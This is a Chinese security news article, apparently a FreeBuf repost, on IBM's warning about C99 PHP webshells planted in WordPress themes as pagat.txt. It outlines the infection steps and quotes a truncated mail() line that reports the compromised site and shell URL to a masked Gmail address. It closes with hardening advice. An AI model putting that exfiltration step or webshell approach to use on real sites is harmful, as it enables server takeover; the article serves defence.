C99 php webshell攻擊加劇,大量WordPress網站遭受威脅

來源:互聯網
上載者:User
近期,IBM的管理安全服務(MSS) 團隊發出警告,稱其監測到通過利用 C99 php webshell, 大量 WordPress 網站遭受到新的攻擊 ,提醒 WordPress 網站管理員應及時掃描並修複網站漏洞。

據悉,基於IBM MSS團隊長期對惡意事件的監測分析, 安全研究人員 發現在過去的兩個月,出現了類C99 webshell引起的流量異常,其中在二月份監測到的事件數目量為404件,而在三月份則達到588件,具體如下,

我們知道,通過Webshell可將惡意檔案上傳到Web伺服器上或者使用將命令傳遞到伺服器上執行。其可通過多種程式設計語言代碼來編寫,從PHP到ASP.NET,從 JavaScript到Ruby,皆可使得攻擊者控制伺服器,而c99 webshell則常為攻擊者所使用。

警惕pagat.txt檔案

IBM MSS安全團隊稱,攻擊者往往利用網站外掛程式的安全性漏洞,通過C99 webshell對其進行感染。在最初感染的階段,webshell指令碼被上傳到了伺服器,並以一個文字檔存放於伺服器上,據研究發現,通常情況下該文字檔名為 pagat.txt。在這個檔案中,IBM安全研究人員也發現了被進行混淆處理的PHP原始碼,相關程式碼片段如下,

為了使代碼更加模糊化以及使得對感染行為的檢測更加困難,攻擊者並沒有把上述的文字檔放置在伺服器的根目錄下或是存放在外掛程式的目錄檔案夾裡面。在大部分案例中,pagat.txt檔案一般是存放在以下路徑中的。

“http://www.website-name.com/wp-content/themes/twentythirteen/pagat.txt”

我們也可以根據這個路徑,對自身的WordPress 站台伺服器進行檢查,看是否存在可疑檔案。

攻擊步驟

攻擊者找到路徑將常值內容傳輸到伺服器的PHP解譯器上。在執行惡意代碼之後,簡單來說 , 一般會執行以下操作,

首先,是發送郵件給攻擊者,通過郵件內容告知當前感染網站的具體位置。此封郵件是發送到一個 Gmail地址的郵箱,其中包含web網站的網域名稱以及webshell的URL。

mail(“XXXXX@gmail.com“, “$body”, “Hasil Bajakan hxxp://$web$inj

接著,通過 pagat.txt檔案內含的代碼,在網站目錄下建立一個表單頁面,具體如下,

最後,攻擊者通過瀏覽器訪問新建立的表單檔案,便可傳遞命令或上傳檔案到伺服器上了,訪問頁面如下,

如所示,Webshell可允許攻擊者在伺服器上運行終端命令或上傳新的檔案到網站上,新的檔案可以是更具侵入性的webshells,DDoS用戶端,比特幣礦工軟體或者是其他的惡意軟體。

據IBM MSS團隊稱,截至至2016年4月12日,僅通過Google 搜尋引擎簡單查詢,就發現其中約有32000個WordPress網站存在pagat.txt檔案。

安全建議

基於目前的情況,建議網站管理員可以進行如下操作,

1、編輯php.ini檔案,禁用base64解碼功能。在php.ini檔案中,找到相關配置語句“disable_functions =”,將該語句設定成“disable_functions = eval,base64_decode, gzinflate”;

2、更改上傳檔案夾名稱。WordPress 允許通過上傳程式將檔案寫入到上傳檔案夾, 如果使用者仍然使用預設名稱,攻擊者可較為容易推測到上傳檔案的具體路徑, 使得攻擊者上傳包含 shell 指令碼的PHP檔案的成本大大降低;

3、安裝一款可用性較強的安全外掛程式,如 wordfence WordPress 外掛程式;

4、進行安全掃描。建議使用開源掃描工具,對上傳檔案進行全量掃描,這裡可使用掃描工具 Modsecurity ,同時通過AWVS或者 WordPress 安全掃描器 對網站進行掃描,及時發現漏洞,並進行修複加固;

5、如果發現網站已經被感染了,建議及時變更網站的所有管理賬戶密碼,並告知網站使用者進行密碼變更。

*參考來源: Softpedia , Securityintelligence ,FB小編troy編譯,轉載請註明來自FreeBuf駭客與極客(FreeBuf.COM)

  • 聯繫我們

    該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

    如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.